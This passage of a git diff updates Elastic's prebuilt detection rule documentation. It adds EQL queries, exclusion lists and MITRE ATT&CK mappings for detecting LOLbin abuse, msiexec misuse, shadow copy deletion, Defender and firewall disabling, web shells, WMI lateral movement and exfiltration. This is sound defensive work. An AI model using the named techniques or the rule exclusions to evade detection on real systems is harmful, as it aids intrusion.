it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-parent-process.asciidoc new file mode 100644 index 0000000000..1062b913eb --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-parent-process.asciidoc @@ -0,0 +1,61 @@ +[[unusual-process-spawned-by-a-parent-process]] +=== Unusual Process Spawned by a Parent Process + +A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-user.asciidoc new file mode 100644 index 0000000000..293a02e66a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-user.asciidoc @@ -0,0 +1,61 @@ +[[unusual-process-spawned-by-a-user]] +=== Unusual Process Spawned by a User + +A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-process-writing-data-to-an-external-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-process-writing-data-to-an-external-device.asciidoc new file mode 100644 index 0000000000..761099cb7c --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unusual-process-writing-data-to-an-external-device.asciidoc @@ -0,0 +1,58 @@ +[[unusual-process-writing-data-to-an-external-device]] +=== Unusual Process Writing Data to an External Device + +A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Physical Medium +** ID: T1052 +** Reference URL: https://attack.mitre.org/techniques/T1052/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-service-host-child-process-childless-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-service-host-child-process-childless-service.asciidoc index 3eee8da09c..031cfd1efa 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-service-host-child-process-childless-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-service-host-child-process-childless-service.asciidoc @@ -34,7 +34,7 @@ Identifies unusual child processes of Service Host (svchost.exe) that traditiona * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -101,3 +101,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Process Hollowing +** ID: T1055.012 +** Reference URL: https://attack.mitre.org/techniques/T1055/012/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-user-privilege-enumeration-via-id.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-user-privilege-enumeration-via-id.asciidoc index 99270b64e4..3499a98c4e 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-user-privilege-enumeration-via-id.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-user-privilege-enumeration-via-id.asciidoc @@ -29,7 +29,7 @@ This rule monitors for a sequence of 20 "id" command executions within 1 second * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -45,7 +45,8 @@ This rule monitors for a sequence of 20 "id" command executions within 1 second ---------------------------------- sequence by host.id, process.parent.entity_id with maxspan=1s [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and - process.name == "id" and process.args_count == 2] with runs=20 + process.name == "id" and process.args_count == 2 and + not (process.parent.name == "rpm" or process.parent.args : "/var/tmp/rpm-tmp*")] with runs=20 ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/virtual-machine-fingerprinting.asciidoc b/docs/detections/prebuilt-rules/rule-details/virtual-machine-fingerprinting.asciidoc index 105313b5bf..cc5b100d46 100644 --- a/docs/detections/prebuilt-rules/rule-details/virtual-machine-fingerprinting.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/virtual-machine-fingerprinting.asciidoc @@ -32,7 +32,7 @@ An adversary may attempt to get detailed information about the operating system * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-powershell.asciidoc index 6b3a505c1f..6dea75f554 100644 --- a/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-powershell.asciidoc @@ -34,11 +34,12 @@ Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve * OS: Windows * Use Case: Threat Detection * Tactic: Impact +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -133,3 +134,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Inhibit System Recovery ** ID: T1490 ** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-wmic.asciidoc b/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-wmic.asciidoc index e93b4be99d..b8ba948277 100644 --- a/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-wmic.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/volume-shadow-copy-deletion-via-wmic.asciidoc @@ -30,11 +30,12 @@ Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly * OS: Windows * Use Case: Threat Detection * Tactic: Impact +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -127,3 +128,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Inhibit System Recovery ** ID: T1490 ** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/web-shell-detection-script-process-child-of-common-web-processes.asciidoc b/docs/detections/prebuilt-rules/rule-details/web-shell-detection-script-process-child-of-common-web-processes.asciidoc index 9808e581c4..c2685c9c3f 100644 --- a/docs/detections/prebuilt-rules/rule-details/web-shell-detection-script-process-child-of-common-web-processes.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/web-shell-detection-script-process-child-of-common-web-processes.asciidoc @@ -34,11 +34,13 @@ Identifies suspicious commands executed via a web server, which may suggest a vu * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Initial Access +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -129,3 +131,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Exploit Public-Facing Application ** ID: T1190 ** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-defender-disabled-via-registry-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-defender-disabled-via-registry-modification.asciidoc index 992bde4bff..c705640376 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-defender-disabled-via-registry-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-defender-disabled-via-registry-modification.asciidoc @@ -36,7 +36,7 @@ Identifies modifications to the Windows Defender registry settings to disable th * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -136,3 +136,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Indicator Blocking ** ID: T1562.006 ** Reference URL: https://attack.mitre.org/techniques/T1562/006/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-firewall-disabled-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-firewall-disabled-via-powershell.asciidoc index 4ae11ea633..1549631859 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-firewall-disabled-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-firewall-disabled-via-powershell.asciidoc @@ -35,11 +35,12 @@ Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -114,3 +115,15 @@ process where host.os.type == "windows" and event.action == "start" and ** Name: Disable or Modify System Firewall ** ID: T1562.004 ** Reference URL: https://attack.mitre.org/techniques/T1562/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-installer-with-suspicious-properties.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-installer-with-suspicious-properties.asciidoc new file mode 100644 index 0000000000..191f50c871 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/windows-installer-with-suspicious-properties.asciidoc @@ -0,0 +1,79 @@ +[[windows-installer-with-suspicious-properties]] +=== Windows Installer with Suspicious Properties + +Identifies the execution of an installer from an archive or with suspicious properties. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files in an attempt to bypass application whitelisting. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/lolbas/Binaries/Msiexec/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [registry where host.os.type == "windows" and process.name : "msiexec.exe" and + ( + (registry.value : "InstallSource" and + registry.data.strings : ("?:\\Users\\*\\Temp\\Temp?_*.zip\\*", + "?:\\Users\\*\\*.7z\\*", + "?:\\Users\\*\\*.rar\\*")) or + + (registry.value : ("DisplayName", "ProductName") and registry.data.strings : "SetupTest") + )] + [process where host.os.type == "windows" and event.action == "start" and + process.parent.name : "msiexec.exe" and + not process.name : "msiexec.exe" and + not (process.executable : ("?:\\Program Files (x86)\\*.exe", "?:\\Program Files\\*.exe") and process.code_signature.trusted == true)] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Msiexec +** ID: T1218.007 +** Reference URL: https://attack.mitre.org/techniques/T1218/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-network-enumeration.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-network-enumeration.asciidoc index d1b6763f18..ccc25fca18 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-network-enumeration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-network-enumeration.asciidoc @@ -30,12 +30,13 @@ Identifies attempts to enumerate hosts in a network using the built-in Windows n * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Collection * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -114,3 +115,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Network Share Discovery ** ID: T1135 ** Reference URL: https://attack.mitre.org/techniques/T1135/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-script-executing-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-script-executing-powershell.asciidoc index 6338a60565..c3e25090d5 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-script-executing-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-script-executing-powershell.asciidoc @@ -30,11 +30,12 @@ Identifies a PowerShell process launched by either cscript.exe or wscript.exe. O * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -123,3 +124,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Spearphishing Attachment ** ID: T1566.001 ** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/windows-script-interpreter-executing-process-via-wmi.asciidoc b/docs/detections/prebuilt-rules/rule-details/windows-script-interpreter-executing-process-via-wmi.asciidoc index 2db2abfc26..473d3cb9ce 100644 --- a/docs/detections/prebuilt-rules/rule-details/windows-script-interpreter-executing-process-via-wmi.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/windows-script-interpreter-executing-process-via-wmi.asciidoc @@ -34,7 +34,7 @@ Identifies use of the built-in Windows script interpreters (cscript.exe or wscri * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -99,6 +99,14 @@ sequence by host.id with maxspan = 5s ** ID: TA0002 ** Reference URL: https://attack.mitre.org/tactics/TA0002/ * Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: ** Name: Windows Management Instrumentation ** ID: T1047 ** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/wmi-incoming-lateral-movement.asciidoc b/docs/detections/prebuilt-rules/rule-details/wmi-incoming-lateral-movement.asciidoc index f7990a92c2..da1d9ca28a 100644 --- a/docs/detections/prebuilt-rules/rule-details/wmi-incoming-lateral-movement.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/wmi-incoming-lateral-movement.asciidoc @@ -31,7 +31,7 @@ Identifies processes executed via Windows Management Instrumentation (WMI) on a * Tactic: Lateral Movement * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -55,13 +55,16 @@ sequence by host.id with maxspan = 2s /* Excluding Common FPs Nessus and SCCM */ - [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and - not process.args : ("C:\\windows\\temp\\nessus_*.txt", - "*C:\\windows\\TEMP\\nessus_*.TMP*", - "*C:\\Windows\\CCM\\SystemTemp\\*", - "C:\\Windows\\CCM\\ccmrepair.exe", - "C:\\Windows\\CCMCache\\*", - "C:\\CCM\\Cache\\*") + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and + not process.Ext.token.integrity_level_name : "system" and not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + not process.executable : + ("?:\\Program Files\\HPWBEM\\Tools\\hpsum_swdiscovery.exe", + "?:\\Windows\\CCM\\Ccm32BitLauncher.exe", + "?:\\Windows\\System32\\wbem\\mofcomp.exe", + "?:\\Windows\\Microsoft.NET\\Framework*\\csc.exe", + "?:\\Windows\\System32\\powercfg.exe") and + not (process.executable : "?:\\Windows\\System32\\msiexec.exe" and process.args : "REBOOT=ReallySuppress") and + not (process.executable : "?:\\Windows\\System32\\inetsrv\\appcmd.exe" and process.args : "uninstall") ] ---------------------------------- @@ -72,6 +75,10 @@ sequence by host.id with maxspan = 2s ** Name: Lateral Movement ** ID: TA0008 ** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ * Tactic: ** Name: Execution ** ID: TA0002 diff --git a/docs/detections/prebuilt-rules/rule-details/wmic-remote-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/wmic-remote-command.asciidoc index 9034c97058..d9957a46a8 100644 --- a/docs/detections/prebuilt-rules/rule-details/wmic-remote-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/wmic-remote-command.asciidoc @@ -30,7 +30,7 @@ Identifies the use of wmic.exe to run commands on remote hosts. While this can b * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -61,6 +61,10 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Windows Remote Management +** ID: T1021.006 +** Reference URL: https://attack.mitre.org/techniques/T1021/006/ * Tactic: ** Name: Execution ** ID: TA0002 diff --git a/docs/detections/prebuilt-rules/rule-details/writedac-access-on-active-directory-object.asciidoc b/docs/detections/prebuilt-rules/rule-details/writedac-access-on-active-directory-object.asciidoc index a952254a73..bed2b3c50f 100644 --- a/docs/detections/prebuilt-rules/rule-details/writedac-access-on-active-directory-object.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/writedac-access-on-active-directory-object.asciidoc @@ -35,7 +35,7 @@ Identifies the access on an object with WRITEDAC permissions. With the WRITEDAC * Use Case: Active Directory Monitoring * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -64,3 +64,7 @@ event.action:"Directory Service Access" and event.code:"5136" and ** Name: File and Directory Permissions Modification ** ID: T1222 ** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Sub-technique: +** Name: Windows File and Directory Permissions Modification +** ID: T1222.001 +** Reference URL: https://attack.mitre.org/techniques/T1222/001/ diff --git a/docs/index.asciidoc b/docs/index.asciidoc index 8045ca2530..5a36834b09 100644 --- a/docs/index.asciidoc +++ b/docs/index.asciidoc @@ -91,3 +91,5 @@ include::detections/prebuilt-rules/downloadable-packages/8-10-2/prebuilt-rules-8 include::detections/prebuilt-rules/downloadable-packages/8-10-3/prebuilt-rules-8-10-3-appendix.asciidoc[] include::detections/prebuilt-rules/downloadable-packages/8-10-4/prebuilt-rules-8-10-4-appendix.asciidoc[] + +include::detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc[]